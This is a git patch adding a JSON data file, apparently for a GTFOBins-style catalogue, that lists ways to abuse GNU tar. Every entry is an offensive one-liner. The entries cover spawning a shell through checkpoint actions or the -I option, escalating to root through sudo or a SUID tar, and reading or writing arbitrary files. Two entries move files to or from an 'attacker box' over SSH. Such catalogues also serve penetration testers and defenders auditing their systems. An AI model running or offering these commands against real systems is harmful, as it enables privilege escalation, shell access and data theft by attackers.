From 3bf918057f23e383f86fec0afb83c0f3df3f5aae Mon Sep 17 00:00:00 2001
From: t0thkr1s <t0thkr1s@icloud.com>
Date: Fri, 10 Jan 2020 13:13:45 +0100
Subject: [PATCH] add data for tar

---
 data/tar.json | 51 +++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 51 insertions(+)
 create mode 100644 data/tar.json

diff --git a/data/tar.json b/data/tar.json
new file mode 100644
index 0000000..0914359
--- /dev/null
+++ b/data/tar.json
@@ -0,0 +1,51 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
+      },
+      {
+        "description": "This only works for GNU tar.",
+        "code": "tar xf /dev/null -I '/bin/sh -c \"sh <&2 1>&2\"'"
+      },
+      {
+        "description": "This only works for GNU tar. It can be useful when only a limited command argument injection is available.",
+        "code": "TF=$(mktemp)\necho '/bin/sh 0<&1' > \"$TF\"\ntar cf \"$TF.tar\" \"$TF\"\ntar xf \"$TF.tar\" --to-command sh\nrm \"$TF\"*\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "This only works for GNU tar. Create tar archive and send it via SSH to a remote location. The attacker box must have the 'rmt' utility installed (it should be present by default in Debian-like distributions).",
+        "code": "tar cvf [user@host]:[destination_file] [source_file] --rsh-command=/bin/ssh\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "This only works for GNU tar. Download and extract a tar archive via SSH. The attacker box must have the 'rmt' utility installed (it should be present by default in Debian-like distributions).",
+        "code": "tar xvf [user@host]:[file] --rsh-command=/bin/ssh\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "This only works for GNU tar.",
+        "code": "TF=$(mktemp)\necho DATA > \"$TF\"\ntar c --xform \"s@.*@[file]@\" -OP \"$TF\" | tar x -P\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "This only works for GNU tar.",
+        "code": "tar xf [file] -I '/bin/sh -c \"cat 1>&2\"'\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
+      }
+    ]
+  }
+}
\ No newline at end of file